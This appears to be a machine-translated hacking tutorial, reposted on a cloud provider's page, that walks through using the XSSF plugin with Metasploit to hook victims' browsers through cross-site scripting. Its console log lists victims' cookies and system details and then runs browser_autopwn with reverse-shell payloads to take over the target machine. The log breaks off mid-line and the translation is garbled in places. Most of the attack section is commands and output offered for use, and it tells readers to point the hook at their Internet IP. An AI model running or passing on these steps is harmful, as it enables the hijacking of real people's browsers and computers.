TEST How xss obtains SYSTEM privileges of the target machine

Source: Internet
Author: User

Author: RootkitHat. Org
Suspected of installing B, but how do you know what system and browser your target uses?
A similar tool here has a: http://xss-proxy.sourceforge.net
Attachment: Parh, sploits, 2011/06, and XSSF.zip
After decompression, copy all the attachments to/msf3 /.
Start metasploit, create a database, and load the plug-in

O 8 o
8 8 8
OoYoYo... oPYo. o8P. oPYo... oPYo. 8. oPYo. o8 o8P
8 8 8 8 oooo8 8. oooo8 Yb .. 8 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 Yb. 8 8 8 8 8 8
8 8 8 'ooo 8 'yoop8' YooP 8 YooP 8 'yoop 8 8
.. :.. :.. :..... :::.. ::..... ::.....: 8 ..... :.. :..... ::.. ::..:
::::: ::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::

= [Metasploit v3.5.1-dev [core: 3.5 api: 1.0]
+ -- = [635 exploits-335 auxiliary
+ -- = [215 payloads-27 encoders-8 nops
= [Svn r11089 updated 239 days ago (2010.11.22)

Warning: This copy of the Metasploit Framework was last updated 239 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:

Http://www.metasploit.com/redmine/projects/framework/wiki/Updating

Msf> db_disconnect
Msf> db_driver mysql
Msf> db_connect root: toor@127.0.0.1/xssftest
Msf> load xssf

______________________
/\_\_\_/___/___/___
/_/\_/_\___\_____
/\_/\_/\_____/\_____\_
/_/_____/_/Cross-Site Scripting Framework
Ludovic Courgnaud-CONIX Security

[+] Server started: http: // 192.168.56.101: 8888/

[*] Please, inject http: // 192.168.56.101: 8888/loop resource in an XSS
[*] Successfully loaded plugin: XSSF if the IP address is not your Internet IP address, change/opt/metasploit3/msf3/plugins/xssf. rb to your Internet IP Address
Then let the target machine xss "http: // 192.168.56.101: 8888/loop"

 

View xss sessions

Msf> xssf_victims

Victims
========

Id xssf_server_id active ip interval browser_name browser_version cookie
-----------------------------------------------------------------
1 1 true 192.168.56.1 2 Internet Explorer 6.0 YES

[*] Use xssf_information [VictimID] to see more information about a victimtrue indicates that you can Use

Link an xss session

Msf> xssf_information 1

Information about victim 1
======================================
Ip address: 192.168.56.1
ACTIVE: TRUE
First request: Tue Jul 19 23:30:25 UTC 2011
Last request: Tue Jul 19 23:31:17 UTC 2011
Connection time: 52.0 seconds
Browser name: Internet Explorer
Browsers VERSION: 6.0
OS NAME: Windows
OS VERSION: XP
ARCHITECTURE: ARCH_X86
LOCATION: file: // C:/Documents and Settings/dis9team/Documents/xss.htm
COOKIES? : YES
How to obtain system permissions for running attack: NONE:

Use the METASPLOIT module to automatically create some browser vulnerabilities. Note that the port cannot be the same as the xssf plug-in port.

Msf> use auxiliary/server/browser_autopwn
Msf auxiliary (browser_autopwn)> show options

Module options:

Name Current Setting Required Description
--------------------------------------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that shoshould be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

Msf auxiliary (browser_autopwn)> set LHOST 192.168.56.101
LHOST => 192.168.56.101
Msf auxiliary (browser_autopwn)> set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
Msf auxiliary (browser_autopwn)> set SRVPORT 8081
SRVPORT => 8081
Msf auxiliary (browser_autopwn)> exploit
Msf auxiliary (browser_autopwn)> exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http: // 192.168.56.101: 8081/QlQp2UFx8EADO
[*] Server started.
Msf auxiliary (browser_autopwn)> [*] Starting exploit multi/browser/java_cale

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.